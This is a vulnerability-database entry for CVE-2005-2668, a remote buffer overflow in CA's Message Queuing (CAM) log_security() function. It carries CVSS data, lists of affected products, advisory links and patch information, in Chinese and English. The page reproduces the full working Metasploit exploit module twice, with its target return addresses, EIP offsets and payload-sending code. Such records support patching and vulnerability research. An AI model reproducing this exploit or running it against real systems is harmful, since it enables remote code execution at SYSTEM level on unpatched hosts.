CVE-2005-2668
CVSS10.0
发布时间 :2005-08-23 00:00:00
修订时间 :2011-03-07 21:24:51
NMCOEPS    

[原文]Multiple buffer overflows in Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allow remote attackers to execute arbitrary code via unknown vectors.


[CNNVD]CA Unicenter CAM 'log_security()' 缓冲区溢出漏洞(CNNVD-200508-250)

        CA Unicenter Management Portal提供对企业管理信息的访问,提供个性化WEB接口等各种Unicenter管理解决方案。
        CA Unicenter的CAM服务实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上执行任意指令。通过向log_security()调用传递一个超长的参数,远程攻击者可以导致缓冲区溢出,精心构造的参数值可以使主机执行攻击者指定的任意指令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ca:unicenter_service_level_management:3.0.1Computer Associates Unicenter Service Level Management 3.0.1
cpe:/a:ca:unicenter_management:4.0::lotus_notes_domino
cpe:/a:ca:unicenter_network_and_systems_management:3.1Computer Associates Unicenter Network and Systems Management 3.1
cpe:/a:ca:unicenter_application_performance_monitor:3.5Computer Associates Unicenter Application Performance Monitor 3.5
cpe:/a:ca:unicenter_tng:2.2:::jp
cpe:/a:ca:unicenter_tng:2.2Computer Associates Unicenter TNG 2.2
cpe:/a:ca:messaging:1.5Computer Associates CAM 1.5
cpe:/a:ca:etrust_admin:2.7
cpe:/a:ca:unicenter_enterprise_job_manager:1.0:sp1
cpe:/a:ca:unicenter_asset_management:3.2:sp2Computer Associates Unicenter Asset Management 3.2 SP2
cpe:/a:ca:unicenter_asset_management:3.2:sp1Computer Associates Unicenter Asset Management 3.2 SP1
cpe:/a:ca:messaging:1.7Computer Associates CAM 1.7
cpe:/a:ca:unicenter_software_delivery:3.1:sp2Computer Associates Unicenter Software Delivery 3.1 SP2
cpe:/a:ca:adviseit:2.4Computer Associates AdviseIT 2.4
cpe:/a:ca:unicenter_management:4.1::microsoft_exchange
cpe:/a:ca:brightstor_san_manager:1.1Computer Associates BrightStor SAN Manager 1.1
cpe:/a:ca:unicenter_data_transport_option:2.0Computer Associates Unicenter Data Transport Option 2.0
cpe:/a:ca:unicenter_network_and_systems_management:3.0Computer Associates Unicenter Network and Systems Management 3.0
cpe:/a:ca:unicenter_software_delivery:3.1:sp1Computer Associates Unicenter Software Delivery 3.1 SP1
cpe:/a:ca:unicenter_management:4.0::microsoft_exchange
cpe:/a:ca:unicenter_management:5.0::web_servers
cpe:/a:ca:unicenter_management:3.5::websphere_mq
cpe:/a:ca:unicenter_nsm_wireless_network_management_option:3.0Computer Associates Unicenter NSM Wireless Network Management Option 3.0
cpe:/a:ca:unicenter_asset_management:3.1Computer Associates Unicenter Asset Management 3.1
cpe:/a:ca:etrust_admin:2.9
cpe:/a:ca:cleverpath_ecm:3.5Computer Associates CleverPath ECM 3.5
cpe:/a:ca:unicenter_application_performance_monitor:3.0Computer Associates Unicenter Application Performance Monitor 3.0
cpe:/a:ca:brightstor_portal:11.1Computer Associates BrightStor Portal 11.1
cpe:/a:ca:unicenter_asset_management:4.0Computer Associates Unicenter Asset Management 4.0
cpe:/a:ca:unicenter_software_delivery:3.0Computer Associates Unicenter Software Delivery 3.0
cpe:/a:ca:unicenter_asset_management:4.0:sp1
cpe:/a:ca:unicenter_tng:2.1Computer Associates Unicenter TNG 2.1
cpe:/a:ca:unicenter_tng:2.4Computer Associates Unicenter TNG 2.4
cpe:/a:ca:unicenter_enterprise_job_manager:1.0:sp2
cpe:/a:ca:etrust_admin:2.1
cpe:/a:ca:cleverpath_aion:10.0Computer Associates CleverPath Aion 10.0
cpe:/a:ca:messaging:1.11Computer Associates CAM 1.11
cpe:/a:ca:cleverpath_predictive_analysis_server:2.0Computer Associates CleverPath Predictive Analysis Server 2.0
cpe:/a:ca:unicenter_software_delivery:4.0:sp1
cpe:/a:ca:etrust_admin:8.0Computer Associates eTrust Admin 8.0
cpe:/a:ca:brightstor_san_manager:1.1:sp2Computer Associates BrightStor SAN Manager 1.1 SP2
cpe:/a:ca:unicenter_service_level_management:3.0Computer Associates Unicenter Service Level Management 3.0
cpe:/a:ca:unicenter_performance_management:2.4:sp3:openvmsComputer Associates Unicenter Performance Management for OpenVMS 2.4 SP3
cpe:/a:ca:advantage_data_transport:3.0Computer Associates Advantage Data Transport 3.0
cpe:/a:ca:unicenter_remote_control:6.0Computer Associates Unicenter Remote Control 6.0
cpe:/a:ca:unicenter_management:5.0.1::web_servers
cpe:/a:ca:brightstor_san_manager:1.1:sp1Computer Associates BrightStor SAN Manager 1.1 SP1
cpe:/a:ca:unicenter_management_portal:2.0Computer Associates Unicenter Management Portal 2.0
cpe:/a:ca:etrust_admin:2.4
cpe:/a:ca:unicenter_jasmine:3.0Computer Associates Unicenter Jasmine 3.0
cpe:/a:ca:unicenter_service_level_management:3.0.2Computer Associates Unicenter Service Level Management 3.0.2
cpe:/a:ca:unicenter_software_delivery:4.0Computer Associates Unicenter Software Delivery 4.0
cpe:/a:ca:brightstor_san_manager:11.1Computer Associates BrightStor SAN Manager 11.1
cpe:/a:ca:unicenter_management_portal:3.1Computer Associates Unicenter Management Portal 3.1
cpe:/a:ca:etrust_admin:8.1Computer Associates eTrust Admin 8.1
cpe:/a:ca:cleverpath_olap:5.1Computer Associates CleverPath OLAP 5.1
cpe:/a:ca:unicenter_service_level_management:3.5Computer Associates Unicenter Service Level Management 3.5
cpe:/a:ca:unicenter_software_delivery:3.1Computer Associates Unicenter Software Delivery 3.1
cpe:/a:ca:cleverpath_predictive_analysis_server:3.0Computer Associates CleverPath Predictive Analysis Server 3.0
cpe:/a:ca:unicenter_tng:2.4.2Computer Associates Unicenter TNG 2.4.2
cpe:/a:ca:unicenter_remote_control:6.0:sp1Computer Associates Unicenter Remote Control 6.0 SP1
cpe:/a:ca:unicenter_asset_management:3.2Computer Associates Unicenter Asset Management 3.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2668
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2668
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-250
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/619988
(UNKNOWN)  CERT-VN  VU#619988
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=32919
(VENDOR_ADVISORY)  MISC  http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=32919
http://www.securityfocus.com/bid/14622
(PATCH)  BID  14622
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp
(VENDOR_ADVISORY)  CONFIRM  http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp
http://secunia.com/advisories/16513
(VENDOR_ADVISORY)  SECUNIA  16513
http://www.vupen.com/english/advisories/2005/1482
(UNKNOWN)  VUPEN  ADV-2005-1482
http://www.osvdb.org/18916
(UNKNOWN)  OSVDB  18916

- 漏洞信息

CA Unicenter CAM 'log_security()' 缓冲区溢出漏洞
危急 缓冲区溢出
2005-08-23 00:00:00 2005-10-20 00:00:00
远程※本地  
        CA Unicenter Management Portal提供对企业管理信息的访问,提供个性化WEB接口等各种Unicenter管理解决方案。
        CA Unicenter的CAM服务实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上执行任意指令。通过向log_security()调用传递一个超长的参数,远程攻击者可以导致缓冲区溢出,精心构造的参数值可以使主机执行攻击者指定的任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam111
        http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam107

- 漏洞信息 (16825)

CA CAM log_security() Stack Buffer Overflow (Win32) (EDBID:16825)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: cam_log_security.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA CAM log_security() Stack Buffer Overflow (Win32)',
			'Description'    => %q{
					This module exploits a vulnerability in the CA CAM service
				by passing a long parameter to the log_security() function.
				The CAM service is part of TNG Unicenter. This module has
				been tested on Unicenter v3.1.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-2668'],
					['OSVDB', '18916'],
					['BID', '14622'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# W2API.DLL @ 0x01950000 - return to ESI
					['W2API.DLL TNG 2.3',  { 'Platform' => 'win', 'Ret' => 0x01951107 }],

					# Return to ESI in ws2help.dll
					['Windows 2000 SP0-SP4 English', { 'Platform' => 'win', 'Ret' => 0x750217ae }],
					['Windows XP SP0-SP1 English',   { 'Platform' => 'win', 'Ret' => 0x71aa16e5 }],
					['Windows XP SP2 English',       { 'Platform' => 'win', 'Ret' => 0x71aa1b22 }],
					['Windows 2003 SP0 English',     { 'Platform' => 'win', 'Ret' => 0x71bf175f }],
				],
			'DisclosureDate' => 'Aug 22 2005',
			'DefaultTarget' => 0))
	end


	def check
		connect
		ack = sock.get_once
		disconnect

		(ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe
	end

	def exploit
		connect

		ack = sock.get_once
		if (ack != "ACK\x00")
			print_status("The CAM service is not responding")
		end

		buf = rand_text_english(4096, payload_badchars)

		# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
		buf[ 1016, 4 ] = [target.ret].pack('V')
		buf[ 1052, payload.encoded.length ] = payload.encoded

		sock.put("\xfa\xf9\x00\x10" + buf + "\x00")

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83148)

CA CAM log_security() Stack Overflow (Win32) (PacketStormID:F83148)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit
CVE-2005-2668
[点击下载]

This Metasploit module exploits a vulnerability in the CA CAM service by passing a long parameter to the log_security() function. The CAM service is part of TNG Unicenter. This Metasploit module has been tested on Unicenter v3.1.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA CAM log_security() Stack Overflow (Win32)',
			'Description'    => %q{
				This module exploits a vulnerability in the CA CAM service
				by passing a long parameter to the log_security() function.
				The CAM service is part of TNG Unicenter. This module has
				been tested on Unicenter v3.1.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-2668'],
					['OSVDB', '18916'],
					['BID', '14622'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,

				},
			'Targets'        => 
				[
	  				# W2API.DLL @ 0x01950000 - return to ESI
					['W2API.DLL TNG 2.3',  { 'Platform' => 'win', 'Ret' => 0x01951107 }],

					# Return to ESI in ws2help.dll
					['Windows 2000 SP0-SP4 English', { 'Platform' => 'win', 'Ret' => 0x750217ae }],
					['Windows XP SP0-SP1 English',   { 'Platform' => 'win', 'Ret' => 0x71aa16e5 }],
					['Windows XP SP2 English',       { 'Platform' => 'win', 'Ret' => 0x71aa1b22 }],
					['Windows 2003 SP0 English',     { 'Platform' => 'win', 'Ret' => 0x71bf175f }],
				],
			'DisclosureDate' => '',
			'DefaultTarget' => 0))
	end


	def check
		connect
		ack = sock.get_once
		disconnect
		
		(ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe	
	end
	
	def exploit
		connect
	
		ack = sock.get_once
		if (ack != "ACK\x00")
			print_status("The CAM service is not responding")
		end
		
		buf = rand_text_english(4096, payload_badchars)
		
		# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
		buf[ 1016, 4 ] = [target.ret].pack('V')
		buf[ 1052, payload.encoded.length ] = payload.encoded 

		sock.put("\xfa\xf9\x00\x10" + buf + "\x00")
		
		handler
		disconnect
	end

end
    

- 漏洞信息

18916
CA Multiple Products Message Queuing (CAM/CAFT) Multiple Remote Overflows
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

Multiple buffer overflows exists in multiple CA products. The Message Queuing component fails to validate multiple unspecified paraments, as well as data passed to the log_security() function resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-08-22 Unknow
2005-10-18 2005-08-22

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, CA has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Computer Associates Message Queuing Buffer Overflow Vulnerability
Boundary Condition Error 14622
Yes Yes
2005-08-22 12:00:00 2007-11-15 12:37:00
The discoverer of this vulnerability is currently unknown. The vendor disclosed this issue.

- 受影响的程序版本

Computer Associates Unicenter TNG JPN 2.2
Computer Associates Unicenter TNG 2.4.2
Computer Associates Unicenter TNG 2.4
Computer Associates Unicenter TNG 2.2
Computer Associates Unicenter TNG 2.1
Computer Associates Unicenter Software Delivery 4.0 SP1
Computer Associates Unicenter Software Delivery 4.0
Computer Associates Unicenter Software Delivery 3.1 SP2
Computer Associates Unicenter Software Delivery 3.1 SP1
Computer Associates Unicenter Software Delivery 3.1
Computer Associates Unicenter Software Delivery 3.0
Computer Associates Unicenter Service Level Management 3.5
Computer Associates Unicenter Service Level Management 3.0.2
Computer Associates Unicenter Service Level Management 3.0.1
Computer Associates Unicenter Service Level Management 3.0
Computer Associates Unicenter Remote Control 6.0 SP1
Computer Associates Unicenter Remote Control 6.0
Computer Associates Unicenter Performance Management for OpenVMS 2.4 SP3
Computer Associates Unicenter NSM Wireless Network Management Option 3.0
Computer Associates Unicenter Network and Systems Management 3.1
Computer Associates Unicenter Network and Systems Management 3.0
Computer Associates Unicenter Management Portal 3.1
Computer Associates Unicenter Management Portal 2.0
Computer Associates Unicenter Management for WebSphere MQ 3.5
Computer Associates Unicenter Management for Web Servers 5.0.1
Computer Associates Unicenter Management for Web Servers 5.0
Computer Associates Unicenter Management for Microsoft Exchange 4.1
Computer Associates Unicenter Management for Microsoft Exchange 4.0
Computer Associates Unicenter Management for Lotus Notes/Domino 4.0
Computer Associates Unicenter Jasmine 3.0
Computer Associates Unicenter Enterprise Job Manager 1.0 SP2
Computer Associates Unicenter Enterprise Job Manager 1.0 SP1
Computer Associates Unicenter Data Transport Option 2.0
Computer Associates Unicenter Asset Management 4.0 SP1
Computer Associates Unicenter Asset Management 4.0
Computer Associates Unicenter Asset Management 3.2 SP2
Computer Associates Unicenter Asset Management 3.2 SP1
Computer Associates Unicenter Asset Management 3.2
Computer Associates Unicenter Asset Management 3.1
Computer Associates Unicenter Application Performance Monitor 3.5
Computer Associates Unicenter Application Performance Monitor 3.0
Computer Associates eTrust Admin 8.1
Computer Associates eTrust Admin 8.0
Computer Associates eTrust Admin 2.9
Computer Associates eTrust Admin 2.7
Computer Associates eTrust Admin 2.4
Computer Associates eTrust Admin 2.1
Computer Associates CleverPath Predictive Analysis Server 3.0
Computer Associates CleverPath Predictive Analysis Server 2.0
Computer Associates CleverPath OLAP 5.1
Computer Associates CleverPath ECM 3.5
Computer Associates CleverPath Aion 10.0
Computer Associates CAM 1.11
Computer Associates CAM 1.07
Computer Associates CAM 1.05
Computer Associates BrightStor SAN Manager 11.1
Computer Associates BrightStor SAN Manager 1.1 SP2
Computer Associates BrightStor SAN Manager 1.1 SP1
Computer Associates BrightStor SAN Manager 1.1
Computer Associates BrightStor Portal 11.1
Computer Associates AdviseIT 2.4
Computer Associates Advantage Data Transport 3.0
Computer Associates CAM 1.11 Build 29_13
Computer Associates CAM 1.07 Build 220_13

- 不受影响的程序版本

Computer Associates CAM 1.11 Build 29_13
Computer Associates CAM 1.07 Build 220_13

- 漏洞讨论

Computer Associates Message Queuing (CAM) is prone to a buffer-overflow vulnerability because the application fails to perform proper bounds checking on user-supplied data.

A successful attack can cause the process's execution stack to overflow and may ultimately allow arbitrary code to run in the context of the affected application. This may allow an attacker to escalate their privileges to SYSTEM level.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit (cacam_logsecurity_win32.pm) as part of the Metasploit Framework has been released.

- 解决方案

The vendor has released updates addressing this and other issues.


Computer Associates CAM 1.11

Computer Associates CAM 1.07

Computer Associates CAM 1.05

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站